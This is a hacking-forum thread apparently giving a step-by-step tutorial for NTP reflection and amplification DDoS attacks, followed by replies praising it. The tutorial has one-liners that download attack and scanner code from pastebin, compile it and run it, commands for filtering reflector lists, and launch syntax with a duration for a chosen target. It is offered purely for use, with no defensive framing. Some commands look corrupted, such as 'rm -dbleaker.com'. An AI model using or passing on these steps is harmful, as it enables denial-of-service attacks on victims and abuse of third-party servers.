Upgrade now, save 50% off for a limited time! Click here to upgrade.


1.0 Introduction to DrDoS
Distributed Reflection Denial of Service, also known as DrDoS has been used for years to create some of the world's largest DDoS attacks! Over the past 5-6 years it has gotten so easy that now anyone can do it with just $10 and some simple knowledge of the Linux OS. Many people use DrDoS in combination with botnets, controlling mass quantities of bots that are able to launch a reflected attack can be overpowering to some. DrDoS is often used in DDoS for Hire sites.

Reflection takes advantage of UDP services. UDP, by design, is a connectionless internet protocol in which the reciever does not fully validate the IPv4 address of the source. This lack of validation makes it possible for someone to pretent to be you! Since it seems like the packets are coming from the target's IP, typically it will send all requests back said IP. This serves 2 purposes of the attack, attack can hide his identity and amplify the attacks greatly.
1.1 Types of Amplification Vectors
In the past there was only DNS amplification, until people started experimenting with other UDP based protocols. Each protocol has a different Bandwidth Amplification Factor, meaning one method might amplify.
100Mbps -> 5000Mbps while another might give you this result: 100Mbps -> 1000Mbps
Here is but a short list of protocols you can abuse:
Quote of the Day
Teamspeak 3
Quake Network Protocol
2.0 Launching a DrDoS Attack
This tutorial is focused around the NTP attack vector.
[Image: Abusing+Network+Time+Protocol+(NTP)+to+p...attack.jpg]

Here is what you will need for this
  • Common Sense
  • Spoofed Dedicated Server with Ubuntu 14.04 64bit Installed
  • Server for reflector scanning
Here is a host that allows IP Header Modification (Spoofing):

Hidden Content
Locked content
You must register or login to view this content.

1.) First you need to setup your attacking server. You can login using a SSH client called PuTTy.
[Image: bb874f939b38428bafad5e30cf8d2da4.png]

2.) You will need to install the dependencies for you to run the attack script
apt-get install gcc wget

3.) Now install the NTP Attack Script:
wget -q http://pastebin.com/raw/fcyCGWqw -O ntp.c; gcc -o ntp ntp.c -pthread; rm -dbleaker.com ntp.c; ./ntp

4.) Here is where you login to your scanning server! And run these commands
apt-get install gcc wget -y; wget -q http://pastebin.com/raw/XWFfm5hh -O ntpscan.c; gcc -o ntpscan ntpscan.c -pthread; rm -dbleaker.com ntpscan.c; ./ntpscan
Example for scanning: ./ntpscan ntp.txt 3 5

Should look something like this:
[Image: 94f2696d150f40e0acb745ac95343ecc.png]
5.) Filtering your reflection lists:

You will often get multipe IPs in one list. Sorts out any duplicate IPs :
cat scanned.txt | sort -u > unique.txt

Sorts IPs over certain response size(ex: 300):
cat scannedlist.txt |awk '{if($2>300)print $1}' | sort -u > output.txt
6.) Now log back into your attacking server and upload your new filtered reflection list of NTP servers. And use this command 
to start an attack. Time is in seconds.

Usage: ./ntp [IP] [file] [threads] [limiter] [time]
Ex: ./ntp ntp.txt 1 -1 300

7.) Here are some results of the successful amplification against another target:
[Image: 14af945bb98749e9a0e65765ddd1594e.png]

[Image: py063Fi.png]
[-] The following 4 users Like LucasYegorov's post:
  • AFG, Devil, DStar, Wubz
Very nice thread! Smile

Great tutorial, well written and in depth. Hopefully I can be a l33t hax0r now.

(10-10-2016, 04:45 AM)AFG Wrote: Very nice thread! Smile

Thank you Smile!

(10-10-2016, 04:45 AM)Axe Wrote: Great tutorial, well written and in depth. Hopefully I can be a l33t hax0r now.

AnYoNe CaN HaKK tHe FuCkInG PlAnEt NoW

[Image: py063Fi.png]
Great tutorial.

If you need help with anything or want to ask a question, PM me.
Well constructed tutorial thank you OP Heart

Got me some reading to do Big Grin
[-] The following 1 user Likes Devil's post:
  • LucasYegorov
Nice tutorial hax god. YusHeart

[Image: H4JQn0Z.gif]
This is actually a dope tutorial, thank you for sharing man. This will help a lot. Heart

Are you a guest to this site? Click the image below and sign up today!
[Image: FTYbRmR.gif]
awesome documentry tenks bro
the hoster frist herberg will suspended servers by outgoing ddos?

Forum Jump:

Users browsing this thread: 1 Guest(s)